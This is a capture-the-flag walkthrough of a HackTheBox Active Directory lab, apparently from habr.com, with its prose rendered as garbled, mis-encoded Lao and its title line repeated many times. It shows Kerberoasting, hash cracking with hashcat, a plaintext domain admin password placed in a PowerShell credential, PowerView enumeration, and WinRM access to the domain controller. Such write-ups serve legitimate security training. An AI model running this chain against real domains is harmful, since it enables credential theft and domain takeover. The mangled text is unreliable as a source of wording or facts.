HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบฅเบฐเบ‚เปเปƒเบซเป‰เป„เบ”เป‰เบฎเบฑเบš hashes เป„เบ”เป‰.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ•เปเปˆเป„เบ›, เบ—เปˆเบฒเบ™เบˆเปเบฒเป€เบ›เบฑเบ™เบ•เป‰เบญเบ‡เป„เบ”เป‰ iterate เปƒเบ™เป„เบฅเบเบฐ hashes เป€เบซเบผเบปเปˆเบฒเบ™เบตเป‰. เป€เบ™เบทเปˆเบญเบ‡เบˆเบฒเบเบงเบฑเบ”เบˆเบฐเบ™เบฒเบ™เบธเบเบปเบก rockyou เบšเปเปˆเบกเบตเบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เป€เบซเบผเบปเปˆเบฒเบ™เบตเป‰, เบ‚เป‰เบญเบเป„เบ”เป‰เปƒเบŠเป‰เบงเบฑเบ”เบˆเบฐเบ™เบฒเบ™เบธเบเบปเบกเบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เบ—เบฑเบ‡เปเบปเบ”เบ—เบตเปˆเบฅเบฐเบšเบธเป„เบงเป‰เปƒเบ™ Seclists. เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบ„เบปเป‰เบ™เบซเบฒเบžเบงเบเป€เบฎเบปเบฒเปƒเบŠเป‰ hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

เปเบฅเบฐเบžเบงเบเป€เบฎเบปเบฒเบŠเบญเบเบซเบฒเบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เบ—เบฑเบ‡เบชเบญเบ‡, เบ—เปเบฒเบญเบดเบ”เปƒเบ™เบงเบฑเบ”เบˆเบฐเบ™เบฒเบ™เบธเบเบปเบก dutch_passwordlist.txt, เปเบฅเบฐเบ—เบตเบชเบญเบ‡เปƒเบ™ Keyboard-Combinations.txt.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบฅเบฐเบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™เบžเบงเบเป€เบฎเบปเบฒเบกเบตเบœเบนเป‰เปƒเบŠเป‰เบชเบฒเบกเบ„เบปเบ™, เปƒเบซเป‰เป„เบ›เบซเบฒเบ•เบปเบงเบ„เบงเบšเบ„เบธเบกเป‚เบ”เป€เบกเบ™. เปƒเบซเป‰เบŠเบญเบเบซเบฒเบ—เบตเปˆเบขเบนเปˆเบ‚เบญเบ‡เบฅเบฒเบงเบเปˆเบญเบ™.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบเบดเปˆเบ‡เปƒเบซเบเปˆ, เบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เบžเบปเบšเป€เบซเบฑเบ™เบ—เบตเปˆเบขเบนเปˆ IP เบ‚เบญเบ‡เบ•เบปเบงเบ„เบงเบšเบ„เบธเบกเป‚เบ”เป€เบกเบ™. เปƒเบซเป‰เบŠเบญเบเบซเบฒเบœเบนเป‰เปƒเบŠเป‰เบ—เบฑเบ‡เบซเบกเบปเบ”เบ‚เบญเบ‡เป‚เบ”เป€เบกเบ™, เป€เบŠเบฑเปˆเบ™เบ”เบฝเบงเบเบฑเบ™เบเบฑเบšเบžเบงเบเป€เบ‚เบปเบฒเปเบกเปˆเบ™เบœเบนเป‰เบšเปเบฅเบดเบซเบฒเบ™. เป€เบžเบทเปˆเบญเบ”เบฒเบงเป‚เบซเบฅเบ”เบชเบฐเบ„เบฃเบดเบšเป€เบžเบทเปˆเบญเปƒเบซเป‰เป„เบ”เป‰เบ‚เปเป‰เบกเบนเบ™ PowerView.ps1. เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™, เบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเป‚เบ”เบเปƒเบŠเป‰ evil-winrm, เบฅเบฐเบšเบธเป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบตเบ—เบตเปˆเบกเบต script เปƒเบ™เบžเบฒเบฅเบฒเบกเบดเป€เบ•เบต -s. เปเบฅเบฐเบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™เบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเบžเบฝเบ‡เปเบ•เปˆเป‚เบซเบฅเบ”เบชเบฐเบ„เบดเบš PowerView.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปƒเบ™เบ›เบฑเบ”เบˆเบธเบšเบฑเบ™เบžเบงเบเป€เบฎเบปเบฒเบกเบตเบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เบซเบ™เป‰เบฒเบ—เบตเปˆเบ‚เบญเบ‡เบกเบฑเบ™เบ—เบฑเบ‡เบซเบกเบปเบ”. เบœเบนเป‰เปƒเบŠเป‰ p00_adm เป€เบšเบดเปˆเบ‡เบ„เบทเบงเปˆเบฒเป€เบ›เบฑเบ™เบœเบนเป‰เปƒเบŠเป‰เบ—เบตเปˆเบกเบตเบชเบดเบ”เบ—เบดเบžเบดเป€เบชเบ”, เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™เบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเป€เบฎเบฑเบ”เบงเบฝเบเบขเบนเปˆเปƒเบ™เบชเบฐเบžเบฒเบšเบเบฒเบ™เบ‚เบญเบ‡เบฅเบฒเบง. เบกเบฒเบชเป‰เบฒเบ‡เบงเบฑเบ”เบ–เบธ PSCredential เบชเปเบฒเบฅเบฑเบšเบœเบนเป‰เปƒเบŠเป‰เบ™เบตเป‰.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

เปƒเบ™เบ›เบฑเบ”เบˆเบธเบšเบฑเบ™เบ„เปเบฒเบชเบฑเปˆเบ‡ Powershell เบ—เบฑเบ‡เบซเบกเบปเบ”เบ—เบตเปˆเบžเบงเบเป€เบฎเบปเบฒเบเปเบฒเบ™เบปเบ” Creds เบˆเบฐเบ–เบทเบเบ›เบฐเบ•เบดเบšเบฑเบ”เป€เบ›เบฑเบ™ p00_adm. เปƒเบซเป‰เบชเบฐเปเบ”เบ‡เบฅเบฒเบเบŠเบทเปˆเบœเบนเป‰เปƒเบŠเป‰เปเบฅเบฐเบ„เบธเบ™เบฅเบฑเบเบชเบฐเบ™เบฐ AdminCount.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบฅเบฐเบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™, เบœเบนเป‰เปƒเบŠเป‰เบ‚เบญเบ‡เบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เบฎเบฑเบšเบชเบดเบ”เบ—เบดเบžเบดเป€เบชเบ”เปเบ—เป‰เป†. เบฅเบญเบ‡เป€เบšเบดเปˆเบ‡เบงเปˆเบฒเบฅเบฒเบงเบขเบนเปˆเปƒเบ™เบเบธเปˆเบกเปƒเบ”.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบžเบงเบเป€เบฎเบปเบฒเบชเบธเบ”เบ—เป‰เบฒเบเบขเบทเบ™เบขเบฑเบ™เบงเปˆเบฒเบœเบนเป‰เปƒเบŠเป‰เป€เบ›เบฑเบ™เบœเบนเป‰เป€เบšเบดเปˆเบ‡เปเบเบ‡เป‚เบ”เป€เบกเบ™. เบ™เบตเป‰เป€เบฎเบฑเบ”เปƒเบซเป‰เบฅเบฒเบงเบกเบตเบชเบดเบ”เบ—เบตเปˆเบˆเบฐเป€เบ‚เบปเป‰เบฒเบชเบนเปˆเบฅเบฐเบšเบปเบšเบ•เบปเบงเบ„เบงเบšเบ„เบธเบกเป‚เบ”เป€เบกเบ™เบˆเบฒเบเป„เบฅเบเบฐเป„เบ. เบฅเบญเบ‡เป€เบ‚เบปเป‰เบฒเบชเบนเปˆเบฅเบฐเบšเบปเบšเบœเปˆเบฒเบ™ WinRM เป‚เบ”เบเปƒเบŠเป‰เบญเบธเป‚เบกเบ‡เบ‚เบญเบ‡เบžเบงเบเป€เบฎเบปเบฒ. เบ‚เป‰เบฒเบžเบฐเป€เบˆเบปเป‰เบฒเป„เบ”เป‰เบชเบฑเบšเบชเบปเบ™เป‚เบ”เบเบ„เบงเบฒเบกเบœเบดเบ”เบžเบฒเบ”เบ—เบตเปˆเบœเบฐเบฅเบดเบ”เป‚เบ”เบ reGeorg เปƒเบ™เป€เบงเบฅเบฒเบ—เบตเปˆเปƒเบŠเป‰ evil-winrm.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบฅเป‰เบงเปƒเบซเป‰เปƒเบŠเป‰เบญเบฑเบ™เบญเบทเปˆเบ™, เบ‡เปˆเบฒเบเบเบงเปˆเบฒ, เบชเบฐเบ„เบฃเบดเบš เป€เบžเบทเปˆเบญเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบเบฑเบš WinRM. เปƒเบซเป‰เป€เบ›เบตเบ”เปเบฅเบฐเบ›เปˆเบฝเบ™เบ•เบปเบงเบเปเบฒเบ™เบปเบ”เบเบฒเบ™เป€เบŠเบทเปˆเบญเบกเบ•เปเปˆ.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบžเบงเบเป€เบฎเบปเบฒเบžเบฐเบเบฒเบเบฒเบกเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆ, เปเบฅเบฐเบžเบงเบเป€เบฎเบปเบฒเบขเบนเปˆเปƒเบ™เบฅเบฐเบšเบปเบš.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบ•เปˆเบšเปเปˆเบกเบตเบ—เบธเบ‡. เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™, เป€เบšเบดเปˆเบ‡เบœเบนเป‰เปƒเบŠเป‰เปเบฅเบฐเบเบงเบ”เป€เบšเบดเปˆเบ‡ desktop.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบžเบงเบเป€เบฎเบปเบฒเบŠเบญเบเบซเบฒเบ—เบธเบ‡เบขเบนเปˆ mr3ks เปเบฅเบฐเบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เปเบกเปˆเบ™เบชเปเบฒเป€เบฅเบฑเบ” 100%.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบซเบกเบปเบ”โ€‹เป€เบ—เบปเปˆเบฒโ€‹เบ™เบตเป‰. เปƒเบ™เบ–เบฒเบ™เบฐเป€เบ›เบฑเบ™เบ„เปเบฒเบ•เบดเบŠเบปเบก, เบเบฐเบฅเบธเบ™เบฒเบชเบฐเปเบ”เบ‡เบ„เบงเบฒเบกเบ„เบดเบ”เป€เบซเบฑเบ™เบงเปˆเบฒเบ—เปˆเบฒเบ™เป„เบ”เป‰เบฎเบฝเบ™เบฎเบนเป‰เบซเบเบฑเบ‡เปƒเบซเบกเปˆเบˆเบฒเบเบšเบปเบ”เบ„เบงเบฒเบกเบ™เบตเป‰เปเบฅเบฐเบงเปˆเบฒเบกเบฑเบ™เป€เบ›เบฑเบ™เบ›เบฐเป‚เบซเบเบ”เบชเปเบฒเบฅเบฑเบšเบ—เปˆเบฒเบ™.

เบ—เปˆเบฒเบ™เบชเบฒเบกเบฒเบ”เป€เบ‚เบปเป‰เบฒเบฎเปˆเบงเบกเบเบฑเบšเบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เบ—เบตเปˆ เป‚เบ—เบฅเบฐเป€เบฅเบ. เบขเบนเปˆเบ—เบตเปˆเบ™เบฑเป‰เบ™เบ—เปˆเบฒเบ™เบชเบฒเบกเบฒเบ”เบŠเบญเบเบซเบฒเบญเบธเบ›เบฐเบเบญเบ™เบ—เบตเปˆเบซเบ™เป‰เบฒเบชเบปเบ™เปƒเบˆ, เบซเบผเบฑเบเบชเบนเบ”เบ—เบตเปˆเบฎเบปเปˆเบงเป„เบซเบผ, เป€เบŠเบฑเปˆเบ™เบ”เบฝเบงเบเบฑเบ™เบเบฑเบšเบŠเบญเบšเปเบง. เบ‚เปเปƒเบซเป‰เบฅเบงเบšเบฅเบงเบกเบŠเบธเบกเบŠเบปเบ™เบ—เบตเปˆเบˆเบฐเบกเบตเบœเบนเป‰เบ—เบตเปˆเป€เบ‚เบปเป‰เบฒเปƒเบˆเบซเบผเบฒเบเบ‚เบปเบ‡เป€เบ‚เบ”เบ‚เบญเบ‡ IT, เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™เบžเบงเบเป€เบฎเบปเบฒเบชเบฐเป€เบซเบกเบตเบชเบฒเบกเบฒเบ”เบŠเปˆเบงเบเป€เบซเบผเบทเบญเป€เบŠเบดเปˆเบ‡เบเบฑเบ™เปเบฅเบฐเบเบฑเบ™เบเปˆเบฝเบงเบเบฑเบšเบšเบฑเบ™เบซเบฒ IT เปเบฅเบฐเบ„เบงเบฒเบกเบ›เบญเบ”เป„เบžเบ‚เปเป‰เบกเบนเบ™เบ‚เปˆเบฒเบงเบชเบฒเบ™.

เปเบซเบผเปˆเบ‡เบ‚เปเป‰เบกเบนเบ™: www.habr.com

เป€เบžเบตเปˆเบกเบ„เบงเบฒเบกเบ„เบดเบ”เป€เบซเบฑเบ™